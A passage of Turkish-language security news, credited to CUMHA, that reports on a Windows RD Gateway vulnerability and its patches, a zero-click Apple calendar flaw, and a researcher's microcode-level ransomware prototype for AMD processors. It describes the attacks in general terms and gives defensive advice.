'Bu tür zafiyetlere hızlı müdahale edilmezse, özellikle büyük sistemlerde yıkıcı etkileri olabilir. CVE-2025-21297 gibi bir açık, istismar edildiğinde saldırgana RD Gateway sunucusu üzerinde tam yetki kazandırabilir. Kurumsal sistemler için ciddi bir tehlike söz konusu.

Riskin boyutu ve etkilenen sistemler
Güvenlik açığı, CVSS puanı 8.1 ile 'yüksek' risk kategorisine alınmış durumda. Açığın istismarı, 9 adımlı heap çarpışmaları içeren karmaşık bir süreci gerektirse de, saldırının başarıya ulaşması durumunda RD Gateway sunucularının tüm kontrolü ele geçirilebiliyor. Açık, aşağıdaki Windows Server sürümlerini etkiliyor:

• Windows Server 2016

• Windows Server 2019

• Windows Server 2022

• Windows Server 2025
  (Core ve Standard yapıları dahil)

Kurumsal ağlar tehdit altında
RD Gateway, kurumsal ağlara güvenli uzak erişim sağlamak amacıyla kullanıldığından, bu zafiyet kritik öneme sahip. Açığın kötüye kullanılması durumunda, kurum ağına yetkisiz erişim sağlanabilir ve veri sızıntısı ya da sistem çökmesi gibi ciddi güvenlik ihlalleri yaşanabilir.

Microsoft’tan güvenlik güncellemeleri
Microsoft, söz konusu güvenlik açığını gidermek üzere Mayıs 2025 itibarıyla çeşitli güvenlik güncellemeleri yayınladı. Etkilenen sistemler için ilgili yama kodları şöyle:

• Windows Server 2016 → KB5050011

• Windows Server 2019 → KB5050008

• Windows Server 2022 → KB5049983

• Windows Server 2025 → KB5050009

Kurumlara acil eylem çağrısı
Uzmanlar, kullanıcıların acilen ilgili yamaları uygulamasını ve RD Gateway sistemlerini sadece güvenilir IP adreslerine erişime açmasını tavsiye ediyor. Ayrıca, RD Gateway loglarının olağandışı aktiviteler açısından düzenli olarak gözden geçirilmesi gerektiği belirtiliyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Zero-Click özelliğiyle çalışıyor
Söz konusu açık, ‘zero-click’ olarak adlandırılan ve kullanıcıdan hiçbir etkileşim gerektirmeyen saldırı türlerinden biri. Zararlı .ics uzantılı bir takvim dosyasıyla bu açığın tetiklenebildiğini aktaran siber güvenlik araştırmacısı Ebubekir Bastama, açığın çalışması için hedefin gelen takvim davetlerini otomatik kabul etmesinin yeterli olduğunu belirtiyor.

Açık eski ancak hâlâ tehlikeli
Ebubekir Bastama’ya göre, her ne kadar bu açık 2022 yılında keşfedilip Apple tarafından düzeltme yayınlanmış olsa da, güncelleme yapılmamış bazı cihazlarda bu zafiyet aktif olarak sömürülebiliyor. Özellikle eski iOS ve macOS sürümlerini kullanan kullanıcılar ciddi risk altında.

Hangi sistemler etkileniyor?
Bu güvenlik açığı, Apple’ın macOS ve iOS işletim sistemlerinde geçerli. Windows ve Android sistemlerde benzeri bir açık henüz tespit edilmedi. Otomatik takvim davetlerini kabul eden cihazlar ise özellikle hedef konumunda.

Saldırganlar ne yapabiliyor?
Açığın istismarıyla saldırganlar aşağıdaki işlemleri gerçekleştirebiliyor:

• Dosya sistemine yazma ve silme işlemleri

• Uzak kod çalıştırma (RCE) yetkisi kazanma

• SMB bağlantıları yoluyla Gatekeeper’ı atlatma

• iCloud senkronizasyonunu kullanarak kişisel fotoğraflara erişme

Tüm bu işlemler, kullanıcıdan herhangi bir onay alınmaksızın yapılabiliyor.

Nasıl korunmalı?
Ebubekir Bastama, bu tür saldırılardan korunmak için cihazların güncel tutulması gerektiğini vurguluyor. Ayrıca Takvim uygulamasında “otomatik davet kabulü” özelliği kapatılmalı, bilinmeyen kişilerden gelen davetler açılmamalı ve dosya sistemi düzenli olarak kontrol edilmelidir.

Uyarı: Güncelleme yapılmayan cihazlar tehdit altında
Bastama, bu tür açıkların yaygınlaşmadan önce fark edilip giderilmesinin büyük veri sızıntılarının önüne geçtiğini ve güncelleme almayan cihazların halen aktif olarak bu zafiyetten etkilenebileceğini belirtiyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

İmzalanmamış mikrokod yüklemesi mümkün hale geldi
Google’ın güvenlik araştırmacıları, AMD Zen 1’den Zen 4’e kadar olan işlemcilerde, imzasız mikrokod yamalarının yüklenmesini mümkün kılan bir açığı daha önce tespit etmişti. Bu durumun Zen 5 serisinde de geçerli olduğu sonradan anlaşıldı. Beek, bu açıklardan yola çıkarak, donanım seviyesinde çalışan ve şifreleme işlemlerini yöneten bir fidye yazılımı prototipi geliştirdi.

İşletim sistemi yeniden yüklenince bile etkisini sürdürüyor
Beek’in geliştirdiği yazılım, sistem formatlansa dahi etkisini yitirmiyor. Çünkü yazılım doğrudan işlemcinin mikrokod seviyesinde çalışıyor. Kodun kamuya açıklanmayacağı belirtilse de, böyle bir yazılımın geliştirilmiş olması, benzer saldırıların başkaları tarafından da gerçekleştirilebileceğini gösteriyor.

UEFI içindeki fidye yazılımı planları ifşa oldu
Beek, analizinde 2022 yılında sızdırılan Conti fidye yazılımı çetesine ait sohbet kayıtlarına da değindi. Bu kayıtlarda çete üyeleri, fidye yazılımını UEFI’ye yerleştirme fikrini tartışıyor ve Windows yeniden yüklense bile sistemin şifreli kalmasını hedefliyorlardı.

Donanım güvenliği ön plana çıkıyor
Christiaan Beek, yaşanan gelişmenin ardından donanım güvenliğinin siber savunma stratejilerinin merkezine alınması gerektiğini belirtiyor. Ona göre CPU ve firmware düzeyindeki açıklar kapatılmadıkça, güçlü parolalar ve yazılımsal çözümler yetersiz kalacak.

Kaynak: CUMHA - CUMHUR HABER AJANSI